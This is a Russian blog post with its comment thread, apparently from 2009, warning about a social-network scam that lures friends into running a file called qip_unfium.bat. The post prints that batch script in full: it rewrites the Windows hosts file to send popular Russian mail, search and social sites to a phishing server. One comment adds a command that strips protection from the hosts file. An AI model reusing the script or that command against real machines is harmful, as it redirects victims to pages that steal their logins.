Похоже, началась очередная эпидемия
фарминга через социальные сети.
В одной из известных популярных социальных сетей (а может, и не в одной?) через систему личных сообщений друзьям рассылаются сообщения вида:
У меня не рaбoтает фaйл один нужный, можешь прoверить у себя?
На что человек, конечно же, получает ответ:
Могу, привет)
И через некоторое время получает следующее сообщение:
urlshort.me/** фaйл без oшибoк зaпускaеться?))
(адрес закрыл звёздочками специально, чтоб неповадно было щёлкать:)
Как человек, наученный жизненным опытом (в том числе и своим), сходил по ссылке браузером в режиме инкогнито. Сокращённая ссылка ведёт на один из популярных файлообменников, с которого предлагают скачать файл
qip_unfium.bat
Ничего не подозревающий пользователь щёлкает по этому файлу, желая помочь другу разобраться с проблемой с Квипом Унфиумом, и… выполняется следующий код:
@rem ----- Exescript Options Begin -----
@rem scriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- Exescript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts
Кстати перед собственно телом скрипта в файле 662 пустые строки.
О последствиях выполнения данного скрипта можно не упоминать.
Мораль? В стотысячный раз напоминаю: остерегайтесь подделок и уточняйте у друзей, а действительно ли они присылали вам такую ссылку.
UPD от 16 ноября 2009 года: Вторая часть Марлезонского балета. :-)
комментарии (134)
Разве что фишка с двумя сообщениями. Хотя я думаю он даже не дожидается ответа а просто отсылает сначала одно сообщение а через минут 5-10 второе
Поясните, что вы имели в виду.
даже если кто-то утянет пароль, то войдя из другого места ему зададут вопрос, например дату рождения, то есть в аккаунт не попасть
собственно именно поэтому спамеры и делают инжект своего ява-скрипт кода в активную сессию, вы заходите на фейсбук, а в страницу троян дописывает яваскрипт код, который вызывает функцию отправки личного сообщения, проще некуда :)
Перечитав ваш пост еще раз я понял что это не он :)
Тем более что куки вконтакте по умолчанию действуют месяц и не привязаны к IP
Хотя можно и в какой-то момент пароль запросить…
Ну и не стоит забывать, что действительно у многих либо выключен UAC, либо отсутствует.
Да и необходимость нажать на ту кнопочку возникает раз в пятилетку, не каждый день устанавливаю пачки программ и выполняю действия, требующие подтверждения.
Ну можно хотя бы для сёрфинга в сети его использовать, в этом отношении пользователю и привыкать особо не придётся после винды…
Это, например, жене можно ставить Ubuntu при условии что сам в нем разбираешся, а поставить среднестатическому юзеру Ubuntu и бросить его с ней один на один, он же будет в ужасе.
Подключение к сети не сложнее чем в Винде, сложные случаи и там и там требуют определенных знаний.
Установка приложений бесконечно проще чем в Виндах.
Придерживаюсь мнения, что абсолютное большинство людей, пересказывающих Линукс-страшилки — предмет обсуждения ни разу в жизни не видели.
Когда вернулся, услышал примерно следующее «Хм, и что сложного в этом Linux'е… фильмы посмотреть можно, в интернете посидеть можно, вроде все понятно...»
Так что неопытный пользователь не всегда офигевает от линукса =)
Просто снеся винду на их компах :))
Для интернета, музыки, фильмов, торрентов, учёбы в школе/универе хватает — не жалуются. :)
И то радует. :)
C:\Users\alex>echo 192.168.1.1 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
Отказано в доступе.
Тут вообще об этом и пишут, что UAC по умолчанию не даёт совершиться злодеянию.
С другой стороны и всякую херню не щелкаю :)
Я даже ругалась с внутренними службами, которые не хотели выпускать патч к внутри-корпоративному софту что бы в Vista работал, но при этом требовали соблюдения информационной безопасности.
Кстати, патч так и не выпустили, а мне это дало повод не заниматся всякой «чушью».
оффтопик: UAC еще с DooMа пошло
Да и если серьёзно, предупреждать уже в (даже не знаю какой по счёту раз) бесполезно.
Те, кто обжигался и больше не хочет этого повторять ссылки по сообщениям в контакте открывает только если просили их себе прислать а «проверить файл» могут и договорившись в аське например.
Ничего не подозревающий пользователь вводит свой логин и пароль и отдает их тем самым злоумышленнику.
Думаю, что там просто ловят куки и всё. :)
serzhenko@serzhenko ~/Загрузки $ wget 81.94.229.115
--2009-10-27 15:39:09-- 81.94.229.115/
Устанавливается соединение с 81.94.229.115:80... соединились.
Запрос HTTP послан, ожидание ответа... 200 OK
Длина: 0 [text/html]
Сохраняется в каталог: `index.html'.
[ <=> ] 0 --.-K/s в 0s
2009-10-27 15:39:09 (0,00 B/s) - `index.html' сохранён [0/0]
занеимением акка на вконтакте спокойно пообщался с сайтом.
А серьёзно — не до того на работе было :(
К сожалению я не web программист, но насколько я понял, деструктивного кода там нет, а cookies так просто не стырыть, если я перехожу по ip?
Trying 81.94.229.115…
Connected to 81.94.229.115.
Escape character is '^]'.
GET / HTTP/1.0
Host: vkontakte.ru
Connection: close
HTTP/1.1 200 OK
Date: Tue, 27 Oct 2009 16:01:22 GMT
Server: Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.4
X-Powered-By: PHP/5.2.4
Content-Length: 130
Connection: close
Content-Type: text/html; charset=windows-1251
Connection closed by foreign host.
porfel@porfel-laptop:~$
porfel@porfel-laptop:~$ telnet 81.94.229.115 80
Trying 81.94.229.115...
Connected to 81.94.229.115.
Escape character is '^]'.
GET / HTTP/1.0
Host: vkontakte.ru
COnnection: close
HTTP/1.1 200 OK
Date: Tue, 27 Oct 2009 16:01:22 GMT
Server: Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.4
X-Powered-By: PHP/5.2.4
Content-Length: 130
Connection: close
Content-Type: text/html; charset=windows-1251
Connection closed by foreign host.
porfel@porfel-laptop:~$
Отдает html со страницей ./fakes/vkontakte/index.html
Они ждут
GET vkontakte.ru HTTP/1.0
p.s. сорри, http 1.1 по памяти не помню.
В этой ветке подробности.
Двух зайцев убивают.
и неимоверно радуюсь тому факту, что я хотя и зарегистрирован в популярных сетях (а кто у нас безгрешен?), но не сижу там сутками напролет. Как результат — мне ничего не приходит.
ЗЫ Ну и думать, что и как ты качаешь, безусловно, тоже необходимо.
Именно потому что для основной массы населения комп — непонятная железяка, мы и не избавимся от таких «хаков». И бесполезно призывать людей к обучению, им просто нафиг это не надо. Более того, люди не ценят свою инфу, поэтому обращаться к разбирающемуся человеку не будут, пока инфа не будет потеряна. И ничего мы тут не сделаем, мы можем только зарабатывать на восстановлении инфы, переустановке оси и т.п.
P.S. Извините, наболело.
Если вы не являетесь «жителем» этой среды, то вам побоку то, что там происходит.
а в остальном — всецело с вами согласен.
Я за редким исключением в инструкцию лезу и мне как пользователю подобной техники уж совсем не нужно изучать методы записи на болванки, сопративление в различных материалах и прочее.
Компьютер в наше время тот же утюг — можно и бо-бо получить и в круглую сумму попасть, если страховки нет.
Комп никому ничего не должен. Он есть и все.
Создавался он как универсальная система и именно благодаря этому вы можете смотреть фильмы, рассчитывать физмодели, сидеть в инете и играть в игры на одном и том же устройстве, в отличие от вашего dvd-проигрывателя или утюга, которые умеют выполнять всего одну функцию. Интернет-технологии также заточены под универсальность.
Именно поэтому для безопасной работы за компьютером надо обладать некоторым объемом знаний чтобы понимать что там происходит, ибо это сложная система. Причем, заметьте, вас никто не просит вникать в тонкость протоколов передачи данных или в устройство ядра ОС. Требуется знать общие понятия и принципы работы. А также мозги — это самое важное, но об этом постоянно забывают.
Чтобы когда вам придет очередное сообщение прислать смс вы посмотрели официальную инфу по этому поводу, а не полезли отправлять смс.
Чтобы когда вам предложат прочитать смс друга вы задумались, а где гарантии что вас не обманут?
Чтобы когда вам пришлют файл xxx.bat вы понимали что это — программа и стоит проявить осторожность, в частности — узнать у вашего знакомого что это за программа, где он ее взял, а после этого проверить на безопасность у ближайшее подкованного знакомого. Да, да, тут придется обращаться к тем, кто в теме. Как и для тонкой настройки фаервола например. Потому что комп — это вам не dvd-проигрыватель и мануалы к нему толще на порядки.
Совроеменные яблочные телефоны тоже многое могут, но вирус там одним кликом не зщапустишь. Индусы, написавшие винду — криворукие инвалиды. ничего не смыслящие в компьютерной безопасности + сама винда сегодня недалеко ушла в плане интерфейса от 95-й, своих толковых идей у микрософтовцев нет.
Пользователь *хорошего* компьютера не должен заморачиваться на знние что такое бат-файл, и не должен платить антивирусным компаниям, все должно работать само.
но эта сеть специализированная и поэтому описанная выше ситуация вряд ли тут возможна.
Как-то шутила с коллегами, рассылая им письма с картинкой, но мне лениво было парсить заголовки запроса, что бы отдавать картинку похожую на пользовательский интерфейс. Но, могу сказать, что любого можно обмануть.
Сомеван:
в очередной раз убеждаюсь, что молотки — зло.
и неимоверно радуюсь тому факту, что я хотя у меня и есть молоток (а кто у нас безгрешен?), но я не стучу им сутками напролет. Как результат — никого ещё не убил.
Hello!
It is noticed that one of the clients of your hosting account used to collect passwords (phishing) from a variety of services — social networks, email systems, etc.
IP-address of the phising server: 81.94.229.115
Take action.
Thank you.
Ответил содержимым батника =) Ждем дальше.
Думаю им бы еще логи распространения _этого_, иначе какая разница, что сервер отдает на определенные поля host.
P.S.: сделал себе на время запись на yandex, стёр все куки, зашел, а там просто ошибка php, в сорсе еще две ссылки на файлы, которые также не работают… (а как хотел проверить поисковик))
Но это еще ладно, но смутило то, что сервер на винде (судя по диску Z:\home\… так что, думаю, что даже не владелец сервера в этом виноват (а вот в том что нет антивиря, точно он!)
«Hello,
we informed our client about this problem.»
Это типа «мы сказали хакеру что он хакер»?
Ппц.
«Hello,
no, user is large company.
now we block this IP address and again informed our client.»
Победа хабра над злом =)
%site_name%/fakes/%site_name%/…
Ребята не палятся совершенно :)
Смотрю сообщение, а там: «скинь смс 2196 255 нa 3649 надеюсь тебе понравится, этo мoй сюрприз для тебя, не посмотришь, я обижусь». Написано действительно от имени близкого друга.
Отправлять СМС я ее, само собой, разубедил, но был крайне удивлен… во-первых, тем, что она изначально повелась, во-вторых, что подобные сообщения стали рассылать через социальные сети, используя взломанные аккаунты друзей.
Кажется подобное бродит по интернету с тех пор как появился контакт
:)
attrib -r -h %windir%\system32\drivers\etc\hostsи все пути открыты
Если пользователь не отключил UAC но жмет OK по инерции — сам виноват.
…
В 99,99% случаях виноват сам пользователь. Один раз угонят аккаунт таким образом, на будущее будем думать. Если конечно умеет учиться на своих ошибках.
Если у пользователя в системе нет UAC? А если UAC его достал? Блин, я не понимаю, защищаете кривую идусскую, поделку, которая из-за совместимости в пред. версиями больна кучей наследственных болезней, вместо того, чтобы честно припзнаоь что система не годится для нормального домашнего пользователя. МС всегда приоритетом ставила корпоративного клиента, а домашний юзер ей безразличен (не верите — посмотрите на сообщения об ошибках типа обратитесь к вашему сис. администратору, ну кто домой нанимает отдельного админа :) ). Вот и имеем то, что имеем.